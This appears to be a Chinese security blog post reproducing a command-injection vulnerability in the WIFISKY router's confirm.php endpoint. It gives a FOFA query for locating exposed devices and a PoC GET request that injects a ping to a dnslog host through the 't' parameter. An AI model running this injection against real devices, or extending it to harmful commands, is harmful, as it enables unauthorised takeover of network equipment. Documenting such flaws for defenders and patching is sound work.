WIFISKY 7层流控路由器 confirm.php RCE漏洞复现

0x01 产品简介

WIFISKY-7层流控路由器是一款可用于家庭或办公环境的无线路由器,具备流控功能以优化网络流量和提供更稳定的网络连接。该路由器采用了7层流控技术,能够依据网络数据包的内容进行智能管理,从而实现对网络流量的精细化控制和优化。这种技术可以提升网络的整体性能,并且确保网络服务按照设定的规则运行,以满足不同应用和用户的需求。

0x02 漏洞概述

WIFISKY-7层流控路由器 confirm.php接口处存在命令执行漏洞,未经身份验证的远程攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

0x03 复现环境

FOFA:app="WIFISKY-7层流控路由器"

0x04 漏洞复现

PoC

GET /notice/confirm.php?t=;ping%20xxxx.dnslog.cn HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, defla

最近更新

  1. TCP协议是安全的吗?

    2024-04-21 12:34:06       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-21 12:34:06       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-21 12:34:06       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-21 12:34:06       18 阅读

热门阅读

  1. js html生成图片

    2024-04-21 12:34:06       19 阅读
  2. 《AI聊天类工具之七—— Grok》

    2024-04-21 12:34:06       15 阅读
  3. 使用Python制作读单词视频(含源码)

    2024-04-21 12:34:06       13 阅读
  4. unet改进笔记

    2024-04-21 12:34:06       18 阅读
  5. 命令模式:将请求封装为对象

    2024-04-21 12:34:06       35 阅读
  6. 设计模式-命令模式

    2024-04-21 12:34:06       16 阅读
  7. 数字化转型安全运维:构建稳健的网络安全防线

    2024-04-21 12:34:06       19 阅读
  8. 【二轮征稿】经济金融发展国际会议(ICEFD 2024)

    2024-04-21 12:34:06       15 阅读
  9. 内存段介绍

    2024-04-21 12:34:06       17 阅读
  10. 如何防止服务器被攻击

    2024-04-21 12:34:06       12 阅读
  11. K8s集群中关于容器的设置

    2024-04-21 12:34:06       26 阅读
  12. 「笔试刷题」:数组中两个字符串的最小距离

    2024-04-21 12:34:06       16 阅读
  13. npm常用命令详解(二)

    2024-04-21 12:34:06       19 阅读